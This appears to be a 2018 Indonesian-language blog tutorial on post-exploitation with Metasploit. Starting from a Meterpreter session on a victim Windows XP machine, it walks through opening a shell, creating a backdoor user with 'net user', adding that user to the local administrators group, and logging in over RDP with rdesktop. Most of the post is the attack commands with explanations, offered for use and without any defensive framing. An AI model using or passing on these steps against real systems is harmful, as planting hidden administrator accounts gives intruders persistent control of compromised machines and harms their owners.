Tuesday, January 30, 2018

Mendapatkan Akses RDP Admin melalui Metasploit

  No comments
Baik kali ini saya ingin berbagi tips untuk kalian yang sudah mendapatkan sesi meterpreter pada metasploit lalu ingin mendapatkan akses RDP Windows dengan hak akses Full Admin. Penasaran? Langsung saja kita simak!



Instruksi

1. Kalian harus sudah mendapatkan sesi meterpreter. Untuk cara mendapatkan sesi meterpreter saya tidak akan bahas pada post kali ini kalian bisa mencari tahu disini.

Sesi meterpreter


Disini saya sudah mendapatkan sesi meterpreter dari target saya, yaitu sebuah komputer dengan OS Windows XP.


2. Buka akses shell pada meterpreter untuk masuk kedalam command prompt target kita

meterpreter > shell


3. Pada command prompt yang terbuka, jalankan perintah dibawah ini untuk membuat user baru pada komputer korban

C:\WINXP\system32> net user tyo tyoganteng /add

- Perintah net user adalah untuk melakukan manajemen user pada Windows.
- String tyo adalah username dari user baru yang akan kita buat.
- String tyoganteng adalah password dari user tyo yang akan kita buat.
- Parameter /add digunakan untuk melakukan penambahan user.


4. Jadikan user tyo tersebut mempunyai hak akses Administrator dengan menjalankan perintah berikut

C:\WINXP\system32> net localgroup administrators tyo /add

- Perintah net localgroup adalah untuk melakukan manajemen hak akses usergroup pada Windows.
- String administrators adalah untuk merubah hak akses user tyo menjadi Administrator.
- String tyo adalah username dari user yang akan kita ubah hak akses nya menjadi Administrator.
- Parameter /add digunakan untuk melakukan penambahan perubahan hak akses.

Bila kalian sukses menjalankan langkah nomor 2 sampai nomor 4, maka kurang lebih akan seperti gambar dibawah

Langkah 2 sampai langkah 4


5. Kalian sudah selesai membuat user baru dengan hak akses Full Administrator. Selanjutnya adalah mencoba untuk login melalui RDP dengan menggunakan rdesktop atau remmina

root@fuckware:~# rdesktop -u tyo -p tyoganteng 192.168.1.100

- Parameter -u tyo adalah untuk login menggunakan user tyo.
- Parameter -p tyoganteng adalah untuk login dengan password tyoganteng.
- Parameter 192.168.1.100 adalah alamat IP dari komputer korban.


Supaya lebih jelas kalian bisa melihat video dibawah ini



Oke sekian post saya kali ini tentang Mendapatkan Akses RDP Admin melalui Metasploit, semoga bermanfaat.
Terimakasih!

No comments :

Post a Comment